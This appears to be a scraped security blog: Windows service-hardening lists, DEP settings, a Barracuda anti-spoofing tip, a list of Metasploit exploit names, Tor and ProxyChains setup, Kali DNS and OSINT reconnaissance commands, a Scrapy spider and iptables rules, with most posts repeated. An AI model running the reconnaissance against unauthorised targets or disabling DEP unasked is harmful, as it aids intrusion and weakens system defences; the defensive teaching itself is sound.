Printer extensions and notifications:(manual) not used by me
Radio Management Service (manual) phone related, not a phone
Sensor Data Service (manual) don't have sensors on my pc
Sensor monitoring service:(manual) not used by me. dont have screen briteness control.
Sensor service:(manual) no orientation device on my pc
Smart card device enumeration service:(manual). dont have smartcard devices
Smart card removal policy:(manual) dont have smartcard device. if hacked will lock pc.
Spatial Data Service (manual) no 3D equipment
Telephony: (manual) dont have telephony devices
Touch keyboard and handwriting panel service:(manual) dont have such device
WalletService (manual) don't use MS Wallet to make payments
Wi-Fi Direct Services Connection Manager Service (manual) don't have Wi-Fi enabled monitor
Windows biometric service:(manual) dont have such device
Windows connect now - config registrar:(manual) dont have wireless on pc
Windows Insider Service (manual) I don't run pre-public-release versions
Windows Perception Service (manual) don't have 3D components
Windows Perception Simulation Service (manual) don't have 3D components
Windows PushToInstall Service (manual) I don't download apps from the Store
WWAN autoconfig:(manual) dont have GSM or CDMA device
Windows 7 64-bit:
Computer Browser (manual) (finds other PCs in the network)
Distributed Link Tracking Client (automatic) (maintain shortcuts if source file name has changed)
DNS client (automatic) (caches previously looked up domain names)
Function Discovery Provider Host (manual) (HomeGroup)
Function discovery resource publication (manual) (HomeGroup)
HomeGroup Listener (manual) (HomeGroup)
HomeGroup Provider (manual) (HomeGroup)
Internet Connection Sharing (disabled) (makes PC act as router)
IP Helper (automatic) (IPv6 tunneling)
Link Layer Topology discovery mapper (manual) (network discovery)
Media Center Extender service (disabled) (turns PC into media server)
Net. TCP port Sharing service (disabled)
NetLogon (manual)
Network Access Protection Agent (manual) (reports security configuration)
Parental controls (manual) (empty stub for compatibility with Vista)
Peer Name Resolution Protocol (manual)
Peer Networking Grouping (manual) (HomeGroup, remote assistance)
Peer Networking Identity Mgr (manual) (HomeGroup, remote assistance)
Performance Counter DLL Host (manual) (allows remote query to performance counters)
Performance Logs & Alerts (manual) (collects remote and local perf data)
PnP-X Ip Bus Enumerator (manual) (uses SSDP)
PNRP Machine Name Publication Service (manual) (server that responds with a machine name)
Quality Windows Audio Video Experience (manual) (multimedia server)
Remote Access Auto Connection Mgr (manual)
Remote Access Connection Manager (manual) (dialup, VPN)
Remote Desktop Configuration (manual)
Remote Desktop Service (manual) (server allowing remote control)
Remote Registry (manual)
Routing and Remote Access (disabled)
Secondary logon (manual)
Secure Socket Tunneling Protocol service (manual) (VPN)
Server (automatic) (HomeGroup, File and Printer Sharing)
SNMP Trap (manual)
SSDP Discovery (manual)
Tablet PC Input Service (manual)
TCP/IP NetBIOS Helper (automatic)
Telephony (manual) (affects Remote Access Connection mgr/ VPN)
UPnP Device host (manual)
Web Client (manual)
Windows Connect Now (manual) (Wireless Setup - simplified configuration)
Windows Error Reporting Service (manual) (reports system problems to MS and fetches solutions)
Windows Event Collector (manual) (allow remote subscription to log events)
Windows Media Player Network Sharing service (manual)
Windows Remote Management (manual) (Server, listens for remote requests )
WinHTTP Web Proxy auto discovery (manual) (proxy discovery and some kind of http api )
WMI Performance Adapter (manual) (provides performance data to other PC collecting it)
Workstation (automatic) (HomeGroup)
https://hardenwindows10forsecurity.com/
https://hardenwindows7forsecurity.com/Harden%20Windows%207%20Home%20Premium%2064bit%20-%20Standalone.html
Windows 10:
AllJoyn router service (manual) not used by me
AVCTP service (manual) related to bluetooth audio and video, not used by me
bluetooth handsfree service:(manual) not used by me.
bluetooth support service:(manual) not used by me.
Certificate propagation (manual) smart card related. not used by me.
Data Usage (automatic) phone releated
Enterprise App Management Service (manual) not used by me
fax:(manual) not used by me
HV Host Service (manual) virtualization, not used by me
Hyper-V ... all 8 services (manual) virtualization. not used by me
Microsoft Account Sign in Assistant (manual) MS Accounts not used by me, NEEDED only for activation.
Microsoft iSCSI initiator service:(manual) not used by me
Network Connection Broker (manual) used by Windows Store, not used by me
Payments and NFC/SE Manager (manual) payment mechanism used by phone
Phone Service (manual) not a phone
Printer spooler:(automatic) not used by me
Printer extensions and notifications:(manual) not used by me
Radio Management Service (manual) phone related, not a phone
Sensor Data Service (manual) don't have sensors on my pc
Sensor monitoring service:(manual) not used by me. dont have screen briteness control.
Sensor service:(manual) no orientation device on my pc
Smart card device enumeration service:(manual). dont have smartcard devices
Smart card removal policy:(manual) dont have smartcard device. if hacked will lock pc.
Spatial Data Service (manual) no 3D equipment
Telephony: (manual) dont have telephony devices
Touch keyboard and handwriting panel service:(manual) dont have such device
WalletService (manual) don't use MS Wallet to make payments
Wi-Fi Direct Services Connection Manager Service (manual) don't have Wi-Fi enabled monitor
Windows biometric service:(manual) dont have such device
Windows connect now - config registrar:(manual) dont have wireless on pc
Windows Insider Service (manual) I don't run pre-public-release versions
Windows Perception Service (manual) don't have 3D components
Windows Perception Simulation Service (manual) don't have 3D components
Windows PushToInstall Service (manual) I don't download apps from the Store
WWAN autoconfig:(manual) dont have GSM or CDMA device
Windows 7 64-bit:
Computer Browser (manual) (finds other PCs in the network)
Distributed Link Tracking Client (automatic) (maintain shortcuts if source file name has changed)
DNS client (automatic) (caches previously looked up domain names)
Function Discovery Provider Host (manual) (HomeGroup)
Function discovery resource publication (manual) (HomeGroup)
HomeGroup Listener (manual) (HomeGroup)
HomeGroup Provider (manual) (HomeGroup)
Internet Connection Sharing (disabled) (makes PC act as router)
IP Helper (automatic) (IPv6 tunneling)
Link Layer Topology discovery mapper (manual) (network discovery)
Media Center Extender service (disabled) (turns PC into media server)
Net. TCP port Sharing service (disabled)
NetLogon (manual)
Network Access Protection Agent (manual) (reports security configuration)
Parental controls (manual) (empty stub for compatibility with Vista)
Peer Name Resolution Protocol (manual)
Peer Networking Grouping (manual) (HomeGroup, remote assistance)
Peer Networking Identity Mgr (manual) (HomeGroup, remote assistance)
Performance Counter DLL Host (manual) (allows remote query to performance counters)
Performance Logs & Alerts (manual) (collects remote and local perf data)
PnP-X Ip Bus Enumerator (manual) (uses SSDP)
PNRP Machine Name Publication Service (manual) (server that responds with a machine name)
Quality Windows Audio Video Experience (manual) (multimedia server)
Remote Access Auto Connection Mgr (manual)
Remote Access Connection Manager (manual) (dialup, VPN)
Remote Desktop Configuration (manual)
Remote Desktop Service (manual) (server allowing remote control)
Remote Registry (manual)
Routing and Remote Access (disabled)
Secondary logon (manual)
Secure Socket Tunneling Protocol service (manual) (VPN)
Server (automatic) (HomeGroup, File and Printer Sharing)
SNMP Trap (manual)
SSDP Discovery (manual)
Tablet PC Input Service (manual)
TCP/IP NetBIOS Helper (automatic)
Telephony (manual) (affects Remote Access Connection mgr/ VPN)
UPnP Device host (manual)
Web Client (manual)
Windows Connect Now (manual) (Wireless Setup - simplified configuration)
Windows Error Reporting Service (manual) (reports system problems to MS and fetches solutions)
Windows Event Collector (manual) (allow remote subscription to log events)
Windows Media Player Network Sharing service (manual)
Windows Remote Management (manual) (Server, listens for remote requests )
WinHTTP Web Proxy auto discovery (manual) (proxy discovery and some kind of http api )
WMI Performance Adapter (manual) (provides performance data to other PC collecting it)
Workstation (automatic) (HomeGroup)
Monday, April 29, 2019
Regarding DEP function being able to defend Buffer Overflow in Windows environments
Determine if DEP has been activated:
wmic OS Get DataExecutionPrevention_SupportPolicy
Statuses of DEP:
Value, Policy Level, Description
2, OptIn (default configuration), Only Windows system components and services have DEP applied
3, OptOut, DEP is enabled for all processes except for a list manually created by Administrator
1, AlwaysOn, DEP is enabled for all processes
0, AlwaysOff, DEP is not enabled for any processes
Enable DEP for all processes:
Execute the command below before restarting the PC:
bcdedit.exe /set nx AlwaysOn
Disable DEP:
Run the following command before restarting the PC:
bcdedit.exe /set nx AlwaysOff
wmic OS Get DataExecutionPrevention_SupportPolicy
Statuses of DEP:
Value, Policy Level, Description
2, OptIn (default configuration), Only Windows system components and services have DEP applied
3, OptOut, DEP is enabled for all processes except for a list manually created by Administrator
1, AlwaysOn, DEP is enabled for all processes
0, AlwaysOff, DEP is not enabled for any processes
Enable DEP for all processes:
Execute the command below before restarting the PC:
bcdedit.exe /set nx AlwaysOn
Disable DEP:
Run the following command before restarting the PC:
bcdedit.exe /set nx AlwaysOff
Monday, April 22, 2019
How to prevent unauthorized users from sending fake emails to Barracuda
Utilizing Wormly.com can allow attackers to send fake emails to Barracuda Email Security Gateway, and Barracuda would accept the emails by default.
The easy way to sort out this issue is to enable a function called "Send Spoof Protection".
Go to "ADVANCED"->"Email Protocol" page, and choose the "Yes" option next to "Sender Spoof Protection" before tapping the "Save" button on the top right side.
Wednesday, April 10, 2019
Tuesday, February 19, 2019
Common Vulnerabilities on Metasploit on Feb 19, 2019
MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020)
Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067)
Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040)
Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026)
Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop (CVE-2010-0017, MSB-MS10-006)
Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240)
Apache mod_isapi <= 2.2.14 Dangling Pointer (CVE-2010-0425)
Java AtomicReferenceArray Type Violation Vulnerability (CVE-2012-0507)
Microsoft Windows Authenticated User Code Execution (CVE-1999-0504)
Microsoft Plug and Play Service Overflow (CVE-2005-1983, MSB-MS05-039)
Microsoft Windows XP/2000 'Lsasrv.dll' Remote Universal (CVE-2003-0533, MS04-011)
MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption (CVE-2017-0143, MS17-010)
Microsoft Windows SMB Processing Array Indexing Vulnerability (CVE-2009-3103, MS09-050)
Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067)
Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040)
Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026)
Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop (CVE-2010-0017, MSB-MS10-006)
Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240)
Apache mod_isapi <= 2.2.14 Dangling Pointer (CVE-2010-0425)
Java AtomicReferenceArray Type Violation Vulnerability (CVE-2012-0507)
Microsoft Windows Authenticated User Code Execution (CVE-1999-0504)
Microsoft Plug and Play Service Overflow (CVE-2005-1983, MSB-MS05-039)
Microsoft Windows XP/2000 'Lsasrv.dll' Remote Universal (CVE-2003-0533, MS04-011)
MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption (CVE-2017-0143, MS17-010)
Microsoft Windows SMB Processing Array Indexing Vulnerability (CVE-2009-3103, MS09-050)
Thursday, January 17, 2019
Threat Intelligence – Regulations
The following laws and regulations should be concerned by
any U.S. banks:
Strongly recommended:
OCC (Office of the Comptroller of the Currency)
DFS 500
FFIEC (P.S.: including Handbooks and Booklets)
Swift Customer Security Program (CSP)
CHIPS
Fedline Security Controls
GLBA
Optional:
PCI-DSS (P.S.: Only for Payment Card Industry)
ISO27001/ISO27002
NIST SP800
FIPS 140-2
ISO27001/ISO27002
NIST SP800
FIPS 140-2
Wednesday, January 16, 2019
Use ProxyChains with Tor
#/etc/init.d/tor start
#vi /etc/proxychains.conf
dynamic_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks4 127.0.0.1 9050
socks5 127.0.0.1 9050
:wq
#proxychains lynx http://v4.ifconfig.co/
#vi /etc/proxychains.conf
dynamic_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks4 127.0.0.1 9050
socks5 127.0.0.1 9050
:wq
#proxychains lynx http://v4.ifconfig.co/
Monday, January 14, 2019
Threat Intelligence - Security News
The news can refer to the websites shown as follows:
https://www.infosecurity-magazine.com/news/
https://threatpost.com/
https://securityintelligence.com/news/
https://www.securityweek.com/
https://www.cnet.com/topics/security/
https://www.bankinfosecurity.com/latest-news
https://www.darkreading.com/
https://www.infosecurity-magazine.com/news/
https://threatpost.com/
https://securityintelligence.com/news/
https://www.securityweek.com/
https://www.cnet.com/topics/security/
https://www.bankinfosecurity.com/latest-news
https://www.darkreading.com/
Sunday, January 13, 2019
Launching a reconnaissance in Kali
#whois aaa.com
#dig aaa.com soa
#dig aaa.com ns
#dig aaa.com a
#dig aaa.com mx
#dig aaa.com txt
#fierce -dns aaa.com
#dnsrecon -d aaa.com -a --iw -z
#theharvester -d aaa.com -b all -l 1000 -h
#dig aaa.com soa
#dig aaa.com ns
#dig aaa.com a
#dig aaa.com mx
#dig aaa.com txt
#fierce -dns aaa.com
#dnsrecon -d aaa.com -a --iw -z
#theharvester -d aaa.com -b all -l 1000 -h
Saturday, January 12, 2019
Set up and use Tor Client in Kali
[Install Tor Client in Kali]:
#apt-get update
#apt-cache search tor|grep '^tor'
#apt-get install tor
[Start Tor service]:
#/etc/init.d/tor start
[How to use Tor service through regular browsers]:
Point the SOCKv5 proxy to 127.0.0.1:9050, and check the option of "Using Sockv5 Proxy's DNS function".
[Use the following websites to verify if you are in Darknet]:
http://xmh57jrzrnw6insl.onion/ '''A Tor Search Engine
http://torlinkbgs6aabns.onion/ '''A darknet yellow book
#apt-get update
#apt-cache search tor|grep '^tor'
#apt-get install tor
[Start Tor service]:
#/etc/init.d/tor start
[How to use Tor service through regular browsers]:
Point the SOCKv5 proxy to 127.0.0.1:9050, and check the option of "Using Sockv5 Proxy's DNS function".
[Use the following websites to verify if you are in Darknet]:
http://xmh57jrzrnw6insl.onion/ '''A Tor Search Engine
http://torlinkbgs6aabns.onion/ '''A darknet yellow book
Friday, January 11, 2019
Install and execute Scrapy in order to find those pages containing specific keywords
[Install Scrapy]:
#apt-get update
#apt-get install python3-scrapy
[Set up a spider]:
#scrapy startproject search_keywords '''Here we create a project call search_keywords
#cd search_keywords
#scrapy genspider demonalex demonalex.com '''Here we create a spider called demonalex
#cd search_keywords/spiders
#cp ./demonalex.py ./demonalex_py.bak
[Modify the spider script]:
#vi ./demonalex.py '''Modify the content of the spider script called demonalex.py
--------------------------------
from io import StringIO
from functools import partial
from scrapy.http import Request
from scrapy.spiders import BaseSpider
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy.item import Item
def find_all_substrings(string, sub):
import re
starts = [match.start() for match in re.finditer(re.escape(sub), string)]
return starts
class WebsiteSpider(CrawlSpider):
name = "demonalex" '''The name of the spider
allowed_domains = ["www.phooky.com"] '''Here we define the domain name being crawled
start_urls = ["http://www.phooky.com"] '''Here we define the start point being scanned
rules = [Rule(LinkExtractor(), follow=True, callback="check_buzzwords")]
crawl_count = 0
words_found = 0
def check_buzzwords(self, response):
self.__class__.crawl_count += 1
crawl_count = self.__class__.crawl_count
wordlist = [ '''This is a keyword list.
"Lorem",
"dolores",
"feugiat",
]
url = response.url
contenttype = response.headers.get("content-type", "").decode('utf-8').lower()
data = response.body.decode('utf-8')
for word in wordlist:
substrings = find_all_substrings(data, word)
for pos in substrings:
ok = False
if not ok:
self.__class__.words_found += 1
print(word + ";" + url + ";")
return Item()
def _requests_to_follow(self, response):
if getattr(response, "encoding", None) != None:
return CrawlSpider._requests_to_follow(self, response)
else:
return []
--------------------------------
[Executing the spider]:
#scrapy crawl demonalex
#apt-get update
#apt-get install python3-scrapy
[Set up a spider]:
#scrapy startproject search_keywords '''Here we create a project call search_keywords
#cd search_keywords
#scrapy genspider demonalex demonalex.com '''Here we create a spider called demonalex
#cd search_keywords/spiders
#cp ./demonalex.py ./demonalex_py.bak
[Modify the spider script]:
#vi ./demonalex.py '''Modify the content of the spider script called demonalex.py
--------------------------------
from io import StringIO
from functools import partial
from scrapy.http import Request
from scrapy.spiders import BaseSpider
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy.item import Item
def find_all_substrings(string, sub):
import re
starts = [match.start() for match in re.finditer(re.escape(sub), string)]
return starts
class WebsiteSpider(CrawlSpider):
name = "demonalex" '''The name of the spider
allowed_domains = ["www.phooky.com"] '''Here we define the domain name being crawled
start_urls = ["http://www.phooky.com"] '''Here we define the start point being scanned
rules = [Rule(LinkExtractor(), follow=True, callback="check_buzzwords")]
crawl_count = 0
words_found = 0
def check_buzzwords(self, response):
self.__class__.crawl_count += 1
crawl_count = self.__class__.crawl_count
wordlist = [ '''This is a keyword list.
"Lorem",
"dolores",
"feugiat",
]
url = response.url
contenttype = response.headers.get("content-type", "").decode('utf-8').lower()
data = response.body.decode('utf-8')
for word in wordlist:
substrings = find_all_substrings(data, word)
for pos in substrings:
ok = False
if not ok:
self.__class__.words_found += 1
print(word + ";" + url + ";")
return Item()
def _requests_to_follow(self, response):
if getattr(response, "encoding", None) != None:
return CrawlSpider._requests_to_follow(self, response)
else:
return []
--------------------------------
[Executing the spider]:
#scrapy crawl demonalex
Tuesday, January 8, 2019
[Threat Intelligence] Threat Intelligence Report's Template
1)Security News [Reader: IT,IS,RISK]
It is able to impose the security awareness of IT, IS, and RISK.
2)New Security Regulation (Specific) [Reader: IT,IS,RISK]
After the new-added regulations are aware, IT, IS, and RISK will trigger a task to revise the corresponding policies and procedures.
3)New Vulnerabilities (Specific) [Reader: IT,IS]
IT and IS should follow up by triggering a hardening process against those new-added vulnerabilities.
4)New Threats (Specific) [Reader: IT,IS]
The risk assessment team should add the new-added threats into the Threat Pool associated with Risk Assessment.
5)Data Leakage Investigation (Specific; those Data Breaches from Internet and Darknet) [Reader: IT,IS,RISK,Management]
When a Data Leakage event happens, the Incident Response process should be triggered.
6)Indicator Of Compromise (i.e. IOC) feeds (They can be added into threat detection systems) [Reader: IT,IS]
The feeds should include the categories below:
-IP Address
-Domain
-URL
-Transport-layer Port Number
-Email Address
-Filename
-File Path
-Hash(MD5 or SHA)
-String
The IOC feeds should be imported to such threat detection systems as IDS/IPS,UTM,Anti-Virus,or even SIEM.
7)Action Plan (Specific; in response to new regulation,vulnerabilities,threats,and IOCs) [Reader: IT,IS,RISK,Management]
It is able to impose the security awareness of IT, IS, and RISK.
2)New Security Regulation (Specific) [Reader: IT,IS,RISK]
After the new-added regulations are aware, IT, IS, and RISK will trigger a task to revise the corresponding policies and procedures.
3)New Vulnerabilities (Specific) [Reader: IT,IS]
IT and IS should follow up by triggering a hardening process against those new-added vulnerabilities.
4)New Threats (Specific) [Reader: IT,IS]
The risk assessment team should add the new-added threats into the Threat Pool associated with Risk Assessment.
5)Data Leakage Investigation (Specific; those Data Breaches from Internet and Darknet) [Reader: IT,IS,RISK,Management]
When a Data Leakage event happens, the Incident Response process should be triggered.
6)Indicator Of Compromise (i.e. IOC) feeds (They can be added into threat detection systems) [Reader: IT,IS]
The feeds should include the categories below:
-IP Address
-Domain
-URL
-Transport-layer Port Number
-Email Address
-Filename
-File Path
-Hash(MD5 or SHA)
-String
The IOC feeds should be imported to such threat detection systems as IDS/IPS,UTM,Anti-Virus,or even SIEM.
7)Action Plan (Specific; in response to new regulation,vulnerabilities,threats,and IOCs) [Reader: IT,IS,RISK,Management]
Saturday, January 5, 2019
Utilize IPTABLES to block ports
Block a port:
#iptables -A INPUT -p tcp --dport 22 -j REJECT
See all rules:
#iptables --list
Empty all rules:
#iptables --flush
#iptables -A INPUT -p tcp --dport 22 -j REJECT
See all rules:
#iptables --list
Empty all rules:
#iptables --flush
Subscribe to:
Posts (Atom)